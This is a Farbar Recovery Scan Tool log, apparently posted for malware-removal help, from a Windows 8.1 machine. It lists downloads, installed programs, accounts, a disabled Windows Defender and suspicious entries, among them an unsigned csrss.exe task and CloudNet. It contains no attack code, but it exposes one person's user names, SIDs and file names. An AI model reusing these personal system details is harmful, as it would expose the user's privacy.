____D C:\Program Files\iTunes 2019-01-26 05:48 - 2019-01-26 05:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud 2019-01-22 12:20 - 2019-01-22 12:21 - 000860720 _____ C:\Users\Stanley\Downloads\Ηλεκτρολογικός εξοπλισμός.2016714105916.xlsx 2019-01-21 12:46 - 2019-01-21 12:46 - 003864349 _____ C:\Users\Stanley\Downloads\GPP002-Schneider-Ersatzteile (1).xlsx 2019-01-21 09:17 - 2019-01-21 09:17 - 000215164 _____ C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI222.srt 2019-01-21 02:12 - 2018-12-14 15:23 - 000107584 ____N C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI.srt 2019-01-21 02:09 - 2019-01-21 09:18 - 000039742 _____ C:\Users\Stanley\Downloads\hunter_killer_english_1340435.zip 2019-01-19 16:06 - 2019-02-10 22:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Monopoly Here & Now Edition 2019-01-19 16:06 - 2019-01-19 16:06 - 000000145 _____ C:\Users\Stanley\Desktop\More SpinTop Games.url 2019-01-19 16:06 - 2019-01-19 16:06 - 000000000 ____D C:\ProgramData\TEMP 2019-01-19 16:02 - 2019-01-19 16:03 - 015141368 _____ C:\Users\Stanley\Downloads\MonopolyHNSetup.exe 2019-01-17 08:42 - 2019-01-17 08:42 - 000019680 _____ C:\Users\Stanley\Downloads\oblivion-2013-1080p.torrent 2019-01-14 15:26 - 2019-01-14 15:26 - 000180948 _____ C:\Users\Stanley\Downloads\BOM_Piping (1).xlsx ==================== One month (modified) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-02-12 07:08 - 2018-05-12 16:21 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\uTorrent 2019-02-12 06:47 - 2014-11-22 04:09 - 000176404 _____ C:\Windows\system32\PerfStringBackup.INI 2019-02-12 06:47 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf 2019-02-12 06:46 - 2018-05-03 17:58 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1001 2019-02-12 06:43 - 2018-12-27 19:56 - 000000000 ___RD C:\Users\Stanley\iCloudDrive 2019-02-12 06:40 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2019-02-12 06:38 - 2018-06-24 08:33 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2019-02-12 06:38 - 2018-05-12 16:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft 2019-02-12 06:20 - 2018-08-24 13:48 - 000000510 _____ C:\Windows\Tasks\UCBrowserUpdater.job 2019-02-12 05:45 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DMCache 2019-02-12 05:22 - 2018-05-09 14:30 - 000507392 ___SH C:\Users\Stanley\Downloads\Thumbs.db 2019-02-12 00:58 - 2013-08-22 14:25 - 000524288 ___SH C:\Windows\system32\config\BBI 2019-02-10 23:14 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Transfer 2019-02-10 23:08 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\Registration 2019-02-10 22:22 - 2018-05-04 17:00 - 000000000 ____D C:\Program Files\Opera 2019-02-10 22:09 - 2018-05-14 11:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinAce 2019-02-10 22:04 - 2018-05-22 09:22 - 000168960 ___SH C:\Users\Stanley\Desktop\Thumbs.db 2019-02-10 22:04 - 2018-05-04 12:30 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Mozilla 2019-02-10 21:35 - 2018-06-24 08:33 - 000002288 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2019-02-10 07:30 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\AppReadiness 2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iMobie 2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\Program Files (x86)\iMobie 2019-02-09 01:00 - 2018-05-04 20:08 - 000001326 _____ C:\Users\Public\Desktop\Skype.lnk 2019-02-09 01:00 - 2018-05-04 20:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2019-02-08 23:59 - 2018-05-03 23:45 - 000000082 _____ C:\Windows\SysWOW64\winsevr.dat 2019-02-08 23:50 - 2018-05-12 16:08 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\uTorrent Web 2019-02-08 23:41 - 2019-01-10 13:08 - 000000414 _____ C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job 2019-02-08 23:36 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\IDM 2019-02-08 23:00 - 2018-10-18 01:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft 2019-02-08 23:00 - 2018-10-18 01:09 - 000000000 ____D C:\ProgramData\iSkysoft 2019-02-07 05:29 - 2018-04-10 15:07 - 000000000 ____D C:\Users\Stanley\Desktop\URCH 2019-02-07 02:08 - 2018-10-18 00:38 - 000000000 ____D C:\Users\Stanley\AppData\Local\iMobie_Inc 2019-02-07 02:04 - 2019-01-10 13:08 - 000003256 _____ C:\Windows\System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## 2019-02-06 07:21 - 2018-10-20 09:06 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Recovery 2019-02-06 06:29 - 2018-04-24 22:26 - 000000000 ____D C:\Program Files\Recuva 2019-02-06 06:23 - 2018-05-19 23:54 - 000363748 _____ C:\Users\Stanley\Desktop\arms & ammunition.txt 2019-02-06 06:00 - 2018-04-23 21:43 - 000000000 ____D C:\lNTEL 2019-02-06 05:57 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\Downloads\Compressed 2019-02-05 11:33 - 2018-06-06 18:08 - 000000000 ____D C:\Program Files (x86)\Anvsoft 2019-02-05 09:51 - 2018-06-06 21:44 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apple Computer 2019-02-05 09:51 - 2018-05-03 17:51 - 000000000 ____D C:\Users\Stanley 2019-02-05 07:07 - 2018-10-18 00:12 - 000000000 ____D C:\ProgramData\Wondershare 2019-02-05 07:06 - 2018-10-18 01:06 - 000000000 ____D C:\Users\Public\Documents\iSkysoft 2019-02-05 07:05 - 2018-10-18 01:09 - 000000000 ____D C:\Program Files (x86)\iSkysoft 2019-02-05 01:31 - 2018-10-18 00:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare 2019-02-05 00:37 - 2018-10-18 00:06 - 000000000 ____D C:\Users\Public\Documents\Wondershare 2019-02-05 00:16 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios 2019-02-05 00:15 - 2018-08-24 13:48 - 000003482 _____ C:\Windows\System32\Tasks\UCBrowserUpdater 2019-02-03 10:53 - 2018-06-03 09:29 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\vlc 2019-01-26 22:19 - 2018-12-27 19:45 - 000000000 ___RD C:\Users\Stanley\OneDrive (3).old 2019-01-25 09:31 - 2018-06-04 00:07 - 000000000 ____D C:\Users\Stanley\AppData\Local\ElevatedDiagnostics 2019-01-24 10:28 - 2018-06-03 08:56 - 000000887 _____ C:\Users\Public\Desktop\VLC media player.lnk 2019-01-23 15:45 - 2018-05-04 07:39 - 000000000 ____D C:\Program Files (x86)\TeamViewer 2019-01-15 17:31 - 2018-05-04 17:06 - 000003842 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1525449700 2019-01-15 17:31 - 2018-05-04 17:01 - 000001021 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk 2019-01-14 09:36 - 2019-01-12 18:34 - 000000000 ____D C:\Windows\LastGood ==================== Files in the root of some directories ======= 2018-08-18 10:56 - 2014-12-19 17:43 - 000000034 _____ () C:\Users\Stanley\AppData\Roaming\pdfdrawcodec.dll 2019-02-05 00:50 - 2019-02-05 00:50 - 007878144 _____ () C:\Users\Stanley\AppData\Local\agent.dat 2019-02-05 00:50 - 2019-02-05 00:50 - 000070896 _____ () C:\Users\Stanley\AppData\Local\Config.xml 2019-01-02 14:34 - 2019-01-02 14:34 - 000003584 _____ () C:\Users\Stanley\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2019-02-05 00:50 - 2019-02-05 00:49 - 001632256 _____ (TODO: <Company name>) C:\Users\Stanley\AppData\Local\Dingbam.exe 2019-02-05 00:50 - 2019-02-05 00:50 - 000278509 _____ () C:\Users\Stanley\AppData\Local\Dingbam.tst 2019-02-05 00:50 - 2019-02-05 00:50 - 001895382 _____ () C:\Users\Stanley\AppData\Local\Dingzap.bin 2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ () C:\Users\Stanley\AppData\Local\installer.dat 2019-02-05 00:50 - 2019-02-05 00:50 - 000005568 _____ () C:\Users\Stanley\AppData\Local\md.xml 2019-02-05 00:50 - 2019-02-05 00:50 - 000126464 _____ () C:\Users\Stanley\AppData\Local\noah.dat 2019-02-05 00:50 - 2019-02-05 00:49 - 001632256 _____ (TODO: <Company name>) C:\Users\Stanley\AppData\Local\Ran-Lex.exe 2019-02-05 00:50 - 2019-02-05 00:50 - 002037348 _____ () C:\Users\Stanley\AppData\Local\Ran-Lex.tst 2018-06-02 10:15 - 2018-06-02 10:15 - 000007611 _____ () C:\Users\Stanley\AppData\Local\Resmon.ResmonCfg 2019-02-05 00:49 - 2019-02-05 01:33 - 000722944 _____ () C:\Users\Stanley\AppData\Local\sham.db 2019-02-05 00:50 - 2019-02-05 00:50 - 000032038 _____ () C:\Users\Stanley\AppData\Local\uninstall_temp.ico Files to move or delete: ==================== C:\Windows\rss\csrss.exe C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe Some files in TEMP: ==================== 2019-02-04 22:34 - 2019-02-05 01:46 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\syncios.exe 2019-01-30 07:52 - 2019-01-30 07:52 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\SynciosDeviceService.exe 2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\syncios.exe 2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\SynciosDeviceService.exe ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\dllhost.exe => File is digitally signed C:\Windows\SysWOW64\dllhost.exe => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2019-01-31 16:49 ==================== End of FRST.txt ============================ ADDITION.TXT Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10.02.2019 01 Ran by #Strazzo.RoseGold## (12-02-2019 07:10:51) Running from C:\Users\Stanley\Downloads\FRST Windows 8.1 Enterprise (Update) (X64) (2018-05-03 16:52:27) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= #Strazzo.RoseGold## (S-1-5-21-1692593245-3285590566-2148222763-1001 - Administrator - Enabled) => C:\Users\Stanley Administrator (S-1-5-21-1692593245-3285590566-2148222763-500 - Administrator - Enabled) => C:\Users\Administrator Guest (S-1-5-21-1692593245-3285590566-2148222763-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1692593245-3285590566-2148222763-1003 - Limited - Disabled) RoseGold (S-1-5-21-1692593245-3285590566-2148222763-1004 - Administrator - Enabled) => C:\Users\RoseGold ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) µTorrent (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.) 1.1.3 (HKLM-x32\...\{A4046FE1-986B-4463-B4DD-CFA473A7056B}_is1) (Version: - PDFZilla) 7-Zip 15.14 (HKLM-x32\...\7-Zip) (Version: 15.14 - Igor Pavlov) Ability Mail Server 4.2.6 (HKLM-x32\...\Ability Mail Server 4_is1) (Version: - Code Crafters Software Limited) Adobe Flash Player 20 ActiveX & Plugins 64-bit (HKLM\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated) AIMP (HKLM-x32\...\AIMP) (Version: v4.00.1687, 18.01.2016 - AIMP DevTeam) Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.) Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.) BlackBerry 10 Desktop Software (Blend, Link, Drivers) (HKLM-x32\...\{c33e77db-89b5-4abf-a1d1-97f8b35347e1}) (Version: 1.2.0.52 - BlackBerry) BlackBerry Blend (HKLM-x32\...\{1DA42C01-4ED2-4B4E-B90C-18FCBA12FC41}) (Version: 1.2.0.50 - BlackBerry Ltd.) Hidden BlackBerry Communication Drivers (HKLM-x32\...\{46CD5A63-0C1F-45C3-B643-CA87A17275C0}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden BlackBerry Device Drivers (HKLM-x32\...\{1F6490E5-7540-426D-BC1E-EB57B0BF0C38}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden BlackBerry Link (HKLM-x32\...\{C42468F9-9812-4550-A54B-5DDB062EB10F}) (Version: 1.2.4.39 - BlackBerry) Hidden BlackBerry Link Remover (HKLM-x32\...\{44D65CAB-1BC8-47B7-BF5B-3EB8B6BB0276}) (Version: 1.2.4.0 - BlackBerry Ltd.) Hidden Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) CloudNet (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION DriverPack Easy Search (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\DriverPack Easy Search) (Version: 1.0 - DriverPack Solution) FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 7.0.1.0 - FlashPeak Inc.) GLO 3G PLUS (HKLM-x32\...\GLO 3G PLUS) (Version: 11.300.05.03.251 - Huawei Technologies Co.,Ltd) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden HP Hotkey Support (HKLM-x32\...\{6E7401DB-B722-4428-BE94-DD4740CF6464}) (Version: 5.0.28.1 - Hewlett-Packard Company) HP Software Framework (HKLM-x32\...\{886D1141-25E5-431F-8326-C3DB6FFCCAF0}) (Version: 4.0.96.1 - Hewlett-Packard Company) HP Support Solutions Framework (HKLM-x32\...\{930B5F2B-8DB9-42F4-90E4-5D3DC30541C3}) (Version: 12.10.49.21 - HP Inc.) HP System Event Utility (HKLM-x32\...\{29E20347-C62F-4657-938E-876A182B67F1}) (Version: 1.4.13 - HP Inc.) iCloud (HKLM\...\{05D97028-FD26-4A3D-BADC-D1CA2E9F1214}) (Version: 7.10.0.9 - Apple Inc.) IncrediMail (HKLM-x32\...\{35505AE1-27E2-4206-B3BF-58771803B8D0}) (Version: 6.6.0.5344 - IncrediMail) Hidden IncrediMail 2.5 (HKLM-x32\...\IncrediMail) (Version: 6.6.0.5344 - IncrediMail Ltd.) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation) Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.) iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.) KeePass Password Safe 2.39.1 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.39.1 - Dominik Reichl) K-Lite Codec Pack 13.8.2 Basic (HKLM-x32\...\KLiteCodecPack_is1) (Version: 13.8.2 - KLCP) LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.2.100 - LSI Corporation) Malwarebytes version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes) Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1 (1033)) (Version: - ) Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM-x32\...\M2698023) (Version: - ) Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM-x32\...\M2833941) (Version: - ) Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM-x32\...\M979906) (Version: - ) Microsoft .NET Framework 1.1 SP1 (HKLM\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: - ) Microsoft .NET Framework 1.1 SP1 (HKLM\...\Microsoft .NET Framework 1.1 (1033)) (Version: - ) Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation) OpenVPN 2.4.6-I602 (HKLM\...\OpenVPN) (Version: 2.4.6-I602 - OpenVPN Technologies, Inc.) Opera Stable 57.0.3098.116 (HKLM-x32\...\Opera 57.0.3098.116) (Version: 57.0.3098.116 - Opera Software) PowerISO (HKLM-x32\...\PowerISO) (Version: 7.2 - Power Software Ltd) Registry Recycler (HKLM-x32\...\Registry Recycler_is1) (Version: 0.9.3.1 - Developer Tribe (Pvt) Ltd.) SAM CoDeC Pack (HKLM\...\SAM CoDeC Pack) (Version: 5.85 - www.SamLab.ws) Skype version 8.38 (HKLM-x32\...\Skype_is1) (Version: 8.38 - Skype Technologies S.A.) SmarterMail Sync for Outlook 2003 and above (HKLM-x32\...\{6567F265-62EC-4BA9-9629-6B483B608854}) (Version: 1.0 - Smarter Tools) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.65 - Synaptics Incorporated) Syncios 6.5.8 (HKLM-x32\...\Syncios) (Version: 6.5.8 - Anvsoft) Syncios Data Recovery 2.0.5 (HKLM-x32\...\06d5deef-8cb6-52ed-a43f-f181f836384a) (Version: 2.0.5 - Syncios Data Recovery) TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - ) TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.53254 - TeamViewer) uTorrent Web (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\utweb) (Version: 0.16.0 - BitTorrent, Inc.) VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN) Web Companion (HKLM-x32\...\{962c09bc-ffdf-415f-8554-7bf56c52618b}) (Version: 4.5.1957.3838 - Lavasoft) WhatsApp (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\WhatsApp) (Version: 0.3.1409 - WhatsApp) WinAce Archiver (HKLM-x32\...\WinAce Archiver) (Version: 2.69 - e-merge GmbH) Windows Driver Package - Google Corporation (androidusb) USB (11/11/2015 1.0.0020.00000) (HKLM\...\964D20A0C219E8C327639DBA3C1FD49434216922) (Version: 11/11/2015 1.0.0020.00000 - Google Corporation) Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass (11/11/2015 2.0.0020.00000) (HKLM\...\B02D55DC05C888A284041A2F8A294C0D557A218C) (Version: 11/11/2015 2.0.0020.00000 - Google, Inc.) Windows Driver Package - SAMSUNG Electronics Co., Ltd. (ssudmdm) Modem (08/24/2016 2.12.4.0) (HKLM\...\B8C7DCAC7E5C993BD8367E5832C6C99E0B248D7A) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. ) Windows Driver Package - SAMSUNG Electronics Co., Ltd. (WinUSB) AndroidUsbDeviceClass (08/24/2016 2.12.4.0) (HKLM\...\609138CA03F1F9B54E04FA4DAB7C0C3F28DE9464) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. ) WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Stanley\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2014-04-21] (Tonec Inc. -> Tonec Inc.) ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) ContextMenuHandlers1-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll [2018-05-04] (Artem Izmaylov -> AIMP DevTeam) ContextMenuHandlers1-x32: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2019-01-15] (Apple Inc. -> Apple Inc.) ContextMenuHandlers1-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd) ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH) ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) ContextMenuHandlers4-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll [2018-05-04] (Artem Izmaylov -> AIMP DevTeam) ContextMenuHandlers4-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd) ContextMenuHandlers4-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2015-06-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) ContextMenuHandlers6-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd) ContextMenuHandlers6-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {019A414B-EDCF-464E-A4FF-6E1780935AB0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe (HP Inc. -> HP Inc.) Task: {0201CCC7-6501-45DB-A996-1FE7FF3DA309} - System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe (Hewlett-Packard Company -> HP Inc.) Task: {121858E1-B466-49DB-ABBF-BE0AD32980CE} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001UA => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe Task: {15570572-319C-48BD-AD3A-A7BCC7852BC7} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [File not signed] <==== ATTENTION Task: {28881E47-3230-4F62-9776-67E7151C7EAD} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe () [File not signed] Task: {3BA5F14D-A722-4A2B-BB6D-E5E747D3F491} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION Task: {44D766A4-890D-4187-8209-27B0E5320737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe (Apple Inc. -> Apple Inc.) Task: {4759FCE5-417F-4558-A8AE-4C124D2B53A7} 